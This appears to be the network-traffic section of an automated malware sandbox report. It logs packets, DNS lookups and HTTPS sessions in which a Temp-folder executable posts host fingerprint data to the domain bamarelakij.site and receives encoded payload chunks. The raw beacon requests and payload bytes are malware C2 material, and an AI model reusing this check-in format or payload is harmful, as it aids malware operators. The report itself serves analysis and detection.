Jan 9, 2025 14:42:53.173207998 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.182457924 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.182471037 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.182481050 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.194027901 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.194027901 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.194284916 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.202398062 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.300807953 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.308722973 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.308739901 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.308749914 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.309166908 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.321592093 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.419959068 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.446862936 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.460695982 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.460746050 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.460758924 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.461086988 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.468475103 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.566776991 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.575242043 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.575253010 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.575263023 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.575618029 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.591784000 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.691622019 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.700562954 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.700766087 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.700776100 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.702553988 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.714659929 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.812951088 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.821556091 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.821568012 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.821589947 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.822782993 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.839339972 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.937666893 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.946036100 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.946052074 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.946063042 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:53.946356058 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:53.954338074 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.054371119 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.063846111 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.063855886 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.063864946 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.064222097 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.074485064 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.173551083 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.186053991 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.186100006 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.186115026 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.186594963 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.186691046 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.186691046 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.202939987 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.302752018 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.310771942 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.310789108 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.310801029 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.311359882 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.332247019 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.447894096 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.447941065 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.447994947 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.448004961 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.448431969 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.457830906 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.556510925 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.564076900 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.564196110 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.564207077 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.564557076 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.575469971 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.675385952 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.682400942 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.682413101 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.683031082 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.683118105 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.683351040 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.683649063 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.692738056 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.790891886 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.797698021 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.797708988 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.798042059 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.798180103 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.811547995 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.910147905 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.918189049 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.918204069 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.918212891 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:54.918567896 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:54.926598072 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:55.037870884 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.053622007 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.053642988 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.053658009 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.054358959 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:55.071552992 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:55.172516108 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.181154013 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.181344986 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.181356907 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.181363106 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:55.181775093 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:55.224046946 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:55.305160046 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:56.638541937 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:56.667330027 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:57.137722969 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:57.165754080 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:43:06.695910931 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:43:33.859498978 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:33.859735012 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:33.860229015 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:33.860322952 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.321227074 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.322424889 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.352926970 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.458395958 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.458410025 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.458417892 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.458426952 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.458888054 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.458962917 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.554312944 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.554764986 CET	50025	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:34.652765989 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.655517101 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.655668020 CET	443	50025	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.655953884 CET	50025	443	192.168.2.8	172.64.41.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 14:42:19.765161991 CET	192.168.2.8	1.1.1.1	0x3238	Standard query (0)	bamarelakij.site	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:30.317107916 CET	192.168.2.8	1.1.1.1	0x7aa0	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:30.317524910 CET	192.168.2.8	1.1.1.1	0x9ee7	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:31.565152884 CET	192.168.2.8	1.1.1.1	0x411e	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:31.565306902 CET	192.168.2.8	1.1.1.1	0xf891	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jan 9, 2025 14:42:32.694437027 CET	192.168.2.8	1.1.1.1	0x6b2f	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.712301970 CET	192.168.2.8	1.1.1.1	0x324c	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:32.724966049 CET	192.168.2.8	1.1.1.1	0x8ce7	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.725229979 CET	192.168.2.8	1.1.1.1	0x50b	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:32.726186037 CET	192.168.2.8	1.1.1.1	0x5765	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.726681948 CET	192.168.2.8	1.1.1.1	0xb801	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:32.749126911 CET	192.168.2.8	1.1.1.1	0x6586	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.749254942 CET	192.168.2.8	1.1.1.1	0x2e0	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:34.629503965 CET	192.168.2.8	1.1.1.1	0xb112	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.629731894 CET	192.168.2.8	1.1.1.1	0xdb15	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:34.732722998 CET	192.168.2.8	1.1.1.1	0x20eb	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.733145952 CET	192.168.2.8	1.1.1.1	0x6495	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:34.733719110 CET	192.168.2.8	1.1.1.1	0x6be9	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.733936071 CET	192.168.2.8	1.1.1.1	0xfb0b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:42:34.748023987 CET	192.168.2.8	1.1.1.1	0xb7aa	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.748297930 CET	192.168.2.8	1.1.1.1	0xce25	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 14:42:19.778969049 CET	1.1.1.1	192.168.2.8	0x3238	No error (0)	bamarelakij.site		172.67.174.91	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:19.778969049 CET	1.1.1.1	192.168.2.8	0x3238	No error (0)	bamarelakij.site		104.21.80.52	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:30.323894978 CET	1.1.1.1	192.168.2.8	0x7aa0	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:30.324501991 CET	1.1.1.1	192.168.2.8	0x9ee7	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:30.332204103 CET	1.1.1.1	192.168.2.8	0x55d7	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:30.333112955 CET	1.1.1.1	192.168.2.8	0xc77c	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:30.333112955 CET	1.1.1.1	192.168.2.8	0xc77c	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:31.572212934 CET	1.1.1.1	192.168.2.8	0xf891	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:31.572788000 CET	1.1.1.1	192.168.2.8	0x411e	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.701181889 CET	1.1.1.1	192.168.2.8	0x6b2f	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.701181889 CET	1.1.1.1	192.168.2.8	0x6b2f	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.701181889 CET	1.1.1.1	192.168.2.8	0x6b2f	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.701181889 CET	1.1.1.1	192.168.2.8	0x6b2f	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:32.732347965 CET	1.1.1.1	192.168.2.8	0x8ce7	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.732578039 CET	1.1.1.1	192.168.2.8	0x50b	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.732927084 CET	1.1.1.1	192.168.2.8	0x5765	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.733370066 CET	1.1.1.1	192.168.2.8	0xb801	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.755827904 CET	1.1.1.1	192.168.2.8	0x2e0	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:32.756048918 CET	1.1.1.1	192.168.2.8	0x6586	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:34.636698961 CET	1.1.1.1	192.168.2.8	0xb112	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:34.636698961 CET	1.1.1.1	192.168.2.8	0xb112	No error (0)	googlehosted.l.googleusercontent.com		172.217.18.97	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.638226032 CET	1.1.1.1	192.168.2.8	0xdb15	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:42:34.739418030 CET	1.1.1.1	192.168.2.8	0x20eb	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.739418030 CET	1.1.1.1	192.168.2.8	0x20eb	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.740063906 CET	1.1.1.1	192.168.2.8	0x6495	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:42:34.740252018 CET	1.1.1.1	192.168.2.8	0x6be9	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.740252018 CET	1.1.1.1	192.168.2.8	0x6be9	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.741003990 CET	1.1.1.1	192.168.2.8	0xfb0b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:42:34.754515886 CET	1.1.1.1	192.168.2.8	0xb7aa	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.754515886 CET	1.1.1.1	192.168.2.8	0xb7aa	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:42:34.755022049 CET	1.1.1.1	192.168.2.8	0xce25	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

bamarelakij.site

chrome.cloudflare-dns.com

clients2.googleusercontent.com

https:

sb.scorecardresearch.com

c.msn.com

browser.events.data.msn.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49714	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:20 UTC	352	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 Content-Length: 147 Host: bamarelakij.site
2025-01-09 13:42:20 UTC	147	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 65 6a e4 36 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzej6$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:42:20 UTC	827	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:42:20 GMT Transfer-Encoding: chunked Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DiTynq5ukLLLhO6cQNnZ4kuujUlUlfZ2lNpoIto%2FJsgT3UJCt3TiACbf2mGkJN2lLfvA3HMiWZ62koo%2BQpTRcDu%2FAekF9pbiVKFuWcrOVXcMmdGjoozMygaLniZnVUz9I%2BkR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d9996e4d5e6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1591&rtt_var=609&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1135&delivery_rate=1780487&cwnd=252&unsent_bytes=0&cid=7f11e07585b283c2&ts=610&x=0"
2025-01-09 13:42:20 UTC	17	IN	Data Raw: 63 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: c
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 33 37 63 37 0d 0a e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec 08 76 59 94 00 65 9b b6 a7 b7 51 c9 Data Ascii: 37c76zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6, vYeQ
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a 8b 04 00 cb 0a e2 03 0f 00 e4 0e 16 Data Ascii: 72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
2025-01-09 13:42:20 UTC	1369	IN	Data Raw: 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a1 b0 Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk\|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79."92.
